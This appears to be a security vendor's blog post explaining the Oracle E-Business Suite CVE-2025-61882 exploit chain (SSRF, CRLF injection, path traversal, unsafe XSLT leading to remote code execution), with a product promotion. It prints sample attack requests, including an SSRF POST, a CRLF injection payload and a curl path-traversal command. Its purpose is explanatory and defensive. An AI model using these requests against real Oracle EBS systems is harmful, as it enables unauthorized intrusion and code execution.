Oracle EBS CVE-2025-61882 Vulnerability: Pre-auth SSRF Leads to Remote Code Execution

On October 4, 2025, Oracle published a security advisory for CVE-2025-61882, a critical pre-authentication remote code execution vulnerability in Oracle E-Business Suite (EBS). The exploit chains several weaknesses, including server-side request forgery (SSRF), CRLF injection, authentication bypass, and unsafe XSLT processing, to achieve unauthenticated code execution on affected systems. Oracle has confirmed that versions 12.2.3 through 12.2.14 are impacted; organizations are advised to apply patches or mitigations without delay.

In this blog, we explain how the Oracle EBS CVE-2025-61882 exploit works, and provide practical validation and remediation guidance.

Simulate Vulnerability Exploitation Attacks with 14-Day Free Trial of Picus Platform

Oracle EBS CVE-2025-61882 Vulnerability Explained

Oracle E-Business Suite (EBS) is an integrated suite of enterprise applications designed to help organizations manage and automate core business processes. It combines modules for finance, human resources, supply chain management, customer relationship management, procurement, manufacturing, and project management within a unified platform.

On October 4, 2025, Oracle released a security advisory for a zero-day vulnerability in Oracle EBS identified as CVE-2025-61882. The vulnerability is a multi-stage exploit chain that combines server-side request forgery (SSRF), CRLF injection, authentication bypass, and unsafe XSLT processing to achieve unauthenticated remote code execution. The vulnerability has a CVSS score of 9.8 (Critical) and affects Oracle EBS versions 12.2.3 through 12.2.14. CVE-2025-61882 is being actively exploited in the wild, including by high-profile threat actors such as the Cl0p ransomware group, which increases the urgency for remediation.

Oracle EBS CVE-2025-61882 Exploit Chain

The CVE-2025-61882 chain begins with a server-side request forgery (SSRF) in the /OA_HTML/configurator/UiServlet endpoint. The servlet accepts an XML document from unauthenticated users via the getUiType parameter. If the redirectFromJsp parameter is present, it parses the XML to extract a return_url and creates an outbound HTTP request. Since the endpoint constructs the target URL directly from untrusted input and follows it using internal client code, an attacker can force the server to contact arbitrary hosts. This SSRF vulnerability provides a critical initial foothold for the rest of the exploit chain.

POST /OA_HTML/configurator/UiServlet
HTTP/1.1 Host: <vulnerable_Oracle_EBS>
Content-Type: application/x-www-form-urlencoded

redirectFromJsp=1&getUiType=<?xml version="1.0" encoding="UTF-8"?>

<param name="ui_type">Applet</param>

</initialize>

Example 1: Exploiting SSRF vulnerability in Oracle EBS [1]

With SSRF control over the outbound connection, the attacker injects carriage-return/line-feed (CRLF) sequences into the URL payload to manipulate request framing and insert attacker-controlled headers. This CRLF injection lets the adversary convert a simple GET into a crafted POST and smuggle additional request data to downstream services. The exploit then leverages HTTP connection reuse (keep-alive) so the staged requests can be pipelined over the same TCP socket, improving timing reliability and ensuring the victim will fetch further payloads from the attacker-controlled host.

<malicious_url>/HeaderInjectionTest HTTP/1.1\r\nInjectedHeader:Injected\r\n\r\n\r\r\n\r\r\n\r\r\n
POST /

Example 2: URL Decoded CRLF Injection Payload [1]

Armed with a POST-capable SSRF and header control, attackers can now target internal services that are not normally reachable from the public interface. Oracle EBS installations often expose an internal HTTP service bound to a private IP and port (commonly 7201). The exploit uses the known internal hostnames that are frequently present in /etc/hosts and a path-traversal technique to bypass pathname-based authentication filters and retrieve otherwise restricted JSP pages. This step turns an internal-only resource into an attacker-controllable execution path.

curl -s --path-as-is http://<vulnerable_Oracle_EBS>:7201/OA_HTML/help/../ieshostedsurvey.jsp

Example 3: Path Traversal for accessing ieshostedsurvey.jsp [1]

Once the attacker can reach the ieshostedsurvey.jsp endpoint, the JSP constructs an XSL stylesheet URL by concatenating http:// with the incoming Host header and appending /ieshostedsurvey.xsl. The server then creates a URL object and passes it to Java's XSL processing pipeline (XSLStylesheet / XSLProcessor), which downloads and executes the stylesheet. Because Java XSLT supports extension functions and can invoke Java classes, an attacker-supplied XSL file can decode a payload and invoke javax.script or other extensions to run arbitrary code in the JVM. With the final unsafe XSLT processing, attackers gain full remote code execution.

How Picus Helps Simulate Oracle EBS CVE-2025-61882 Attacks?

We also strongly suggest simulating the Oracle EBS CVE-2025-61882 vulnerability to test the effectiveness of your security controls against sophisticated cyber attacks using the Picus Security Validation Platform. You can also test your defenses against other vulnerability exploitation attacks, such as regreSSHion, Citrix Bleed, and Follina, within minutes with a 14-day free trial of the Picus Platform.

Picus Threat Library includes the following threats for Oracle EBS CVE-2025-61882 vulnerability exploitation attacks:

Threat ID	Threat Name	Attack Module
52564	Oracle E-Business Suite Web Attack Campaign	Web Application

Start simulating emerging threats today and get actionable mitigation insights with a  14-day free trial  of the Picus Security Validation Platform.

References

[1] "Well, Well, Well. It's Another Day. (Oracle E-Business Suite Pre-Auth RCE Chain - CVE-2025-61882)." Available: https://labs.watchtowr.com/well-well-well-its-another-day-oracle-e-business-suite-pre-auth-rce-chain-cve-2025-61882well-well-well-its-another-day-oracle-e-business-suite-pre-auth-rce-chain-cve-2025-61882/